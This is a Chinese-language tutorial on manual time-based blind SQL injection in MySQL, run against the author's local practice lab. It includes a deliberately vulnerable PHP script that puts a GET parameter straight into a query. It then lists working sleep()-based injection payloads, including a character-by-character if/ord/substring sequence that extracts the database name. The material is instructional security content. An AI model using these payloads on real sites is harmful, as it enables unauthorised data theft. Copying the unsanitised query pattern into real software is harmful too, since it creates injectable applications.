php mysql盲注_Mysql时间盲注手工注入详解

练习环境与布尔型盲注差不多，php代码改下

/* 关闭错误信息 */

error_reporting(0);

/* 设置header编码 */

header("Content-type: text/html; charset=utf-8");

/* 连接信息 */

$host = '127.0.0.1';

$user = 'root';

$pass = 'root';

$db = 'test';

if(@isset($_GET['name'])){

$conn = mysqli_connect($host,$user,$pass,$db) or die('Link False');

$sql = "SELECT * FROM user where user='".$_GET['name']."'";

echo '

'.$sql.'

';

$res = mysqli_query($conn,$sql);

}else{

echo 'sql-time.php?name=user1';

}

?>

0x00 什么是时间盲注

时间盲注指通过页面执行的时间来判断数据内容的注入方式，通常用于数据(包含逻辑型)不能返回到页面中的场景，无法利用页面回显判断数据内容，只能通过执行的时间来获取数据

0x01 基础知识

这里就比较简单了，介绍一个Mysql中的流程控制

if

if(表达式,真,假)

当表达式成立时，会执行真，反之执行假

example

if

0x01 手工注入

判断注入点

就不多废话了，上payload，具体可参考布尔型盲注的原理

/* 整型注入 */

sql-bool.php?name=user1 and sleep(5)

sql-bool.php?name=user1 and sleep(10)

/* 字符型注入 */

sql-bool.php?name=user1' and sleep(5) and '1'='1

sql-bool.php?name=user1' and sleep(10) and '1'='2

/* 字符型注入 */

sql-bool.php?name=user1" and sleep(5) and "1"="1

sql-bool.php?name=user1" and sleep(10) and "1"="2

这里为了方便看响应时间用burp来发送请求

正常请求

' and sleep(5) and '1'='1

' and sleep(10) and '1'='1

可以看到，正常访问时，页面响应时间为2毫秒，sleep(5)时响应约为5秒，sleep(10)时，约为10秒

由此可判断页面存在时间盲注

读数据

原理大致与布尔型盲注一样，不过由于布尔型无法返回页面，所以通过if来触发sleep()函数，这样就可以通过时间判断表达式的真或假，从而判断数据的内容

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 97,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 98,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 99,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 100,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 101,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 102,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 103,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 104,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 105,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 106,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 107,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 108,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 109,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 110,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 111,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 112,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 113,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 114,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 115,sleep(5),1) and '1'='1

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 116,sleep(5),1) and '1'='1

在其他数值时，页面响应时间约为3毫秒

other

在判断与116是否相等时，页面响应时间约为5秒

116

由此可判断数据库名第一个字符为t

其他以此类推